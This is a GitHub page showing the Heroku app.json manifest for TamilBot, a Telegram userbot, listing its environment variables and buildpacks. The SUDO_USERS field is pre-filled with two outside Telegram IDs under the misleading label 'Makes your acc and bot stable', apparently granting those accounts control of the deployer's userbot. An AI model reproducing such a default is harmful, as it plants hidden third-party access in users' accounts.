-
Notifications
You must be signed in to change notification settings - Fork 41
Expand file tree
/
Copy pathapp.json
More file actions
117 lines (117 loc) · 4.25 KB
/
app.json
File metadata and controls
117 lines (117 loc) · 4.25 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
{
"name": "TamilBot",
"description": "பைதான் 3 இல் இயங்கும் ஒரு டெலிகிராம் யூசர்போட்.",
"logo": "https://telegra.ph/file/2790938cacb9aa80d478c.jpg",
"keywords": [
"telegram",
"userbot",
"plugin",
"modular",
"productivity"
],
"repository": "https://github.com/ivetri/TamilBot",
"website": "https://github.com/ivetri/TamilBot",
"success_url": "#TODO",
"env": {
"ENV": {
"description": "Setting this to ANYTHING will enable heroku.",
"value": "ANYTHING"
},
"TEMP_DOWNLOAD_DIRECTORY": {
"description": "Where downloaded files will go.",
"value": "./userbot/DOWNLOADS/",
"required": false
},
"APP_ID": {
"description": "https://my.telegram.org இருந்து பெறுங்கள்.",
"value": ""
},
"API_HASH": {
"description": "https://my.telegram.org இருந்து பெறுங்கள்.",
"value": ""
},
"STRING_SESSION": {
"description": "generate_string_session.py Or https://repl.it/@Ivetri/TamilBot பயன்படுத்தி உருவாக்கவும்.",
"value": ""
},
"GITHUB_ACCESS_TOKEN": {
"description": "Your Github Access Token for gitcommit plugin.Google 'Github access token' to find.",
"value": "",
"required": false
},
"GIT_REPO_NAME": {
"description": "Your repo name Example: ivetri/TamilBot, but GITHUB_ACCESS_TOKEN must be setup first.",
"value": "",
"required": false
},
"LYDIA_API_KEY": {
"description": "Needed for Lydia AI. Follow https://telegra.ph/Lydia-09-05 to get your API.",
"value": "",
"required": false
},
"SUDO_USERS": {
"description": "Makes your acc and bot stable",
"value": "1492186775 1169076058",
"required": false
},
"HEROKU_API_KEY": {
"description": "Go to https://dashboard.heroku.com/account, கீழே சென்று அழுத்தவும் Reveal API.புதுப்பிக்க வேலை செய்ய தேவை.",
"value": "",
"required": false
},
"HEROKU_APP_NAME": {
"description": "உங்கள் heroku app-ன் பெயர்..",
"value": "",
"required": false
},
"TG_BOT_TOKEN_BF_HER": {
"description": "inline buttons உருவாக்க தேவை. [BotFather](http://telegram.dog/BotFather) இல் ஒரு போட் செய்யுங்கள். உங்கள் போட்டின் டோக்கனைப் பெறுங்கள்.",
"value": "",
"required": true
},
"CHROME_BIN": {
"description": "For Carbon.py. அப்படியே விடுங்கள். ",
"value": "/app/.apt/usr/bin/google-chrome",
"required": false
},
"CHROME_DRIVER": {
"description": "For Carbon.py. அப்படியே விடுங்கள். ",
"value": "/app/.chromedriver/bin/chromedriver",
"required": false
},
"TG_BOT_USER_NAME_BF_HER": {
"description": "inline buttons உருவாக்க தேவை.[BotFather](http://telegram.dog/BotFather) இல் ஒரு போட் செய்யுங்கள்.உங்கள் போட்டின் பயனர்பெயரைப் பெறுங்கள்",
"value": "",
"required": true
},
"DOWNLOAD_PFP_URL_CLOCK": {
"description": "Needed for autopic module. A url that is a preview link of your Profile Pic",
"value": "",
"required": false
},
"TZ": {
"description": "Required for Correct Time on autopic",
"value": "Asia/Kolkata",
"required": false
}
},
"addons": [{
"plan": "heroku-postgresql",
"options": {
"version": "12"
}
}],
"buildpacks": [{
"url": "https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest"
},{
"url":"https://github.com/amivin/aria2-heroku.git"
},{
"url":"https://github.com/heroku/heroku-buildpack-google-chrome"
},{
"url":"https://github.com/heroku/heroku-buildpack-chromedriver"
},{
"url": "https://github.com/opendoor-labs/heroku-buildpack-p7zip"
},{
"url": "heroku/python"
}]
}